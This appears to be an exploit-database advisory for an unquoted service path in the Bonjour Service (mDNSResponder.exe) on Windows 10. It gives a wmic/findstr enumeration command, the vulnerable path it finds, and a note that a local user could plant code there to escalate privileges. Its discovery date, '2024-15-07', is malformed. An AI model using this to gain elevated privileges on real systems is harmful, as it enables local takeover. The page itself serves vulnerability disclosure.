Bonjour service mdnsresponder.exe unquoted service path privilege escalation Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-07-16 |
Type : local |
Platform : windows
[+] Code ...
# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service
Path
# Discovery by: bios
# Discovery Date: 2024-15-07
# Vendor Homepage: https://developer.apple.com/bonjour/
# Tested Version: 3,0,0,10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Bonjour Service
Bonjour Service
C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe
Auto
C:\>systeminfo
Host Name: DESKTOP-HFBJOBG
OS Name: Microsoft Windows 10 Home
OS Version: 10.0.19045 N/A Build 19045
There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .
This may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate privileges.
Bonjour service mdnsresponder.exe unquoted service path privilege escalation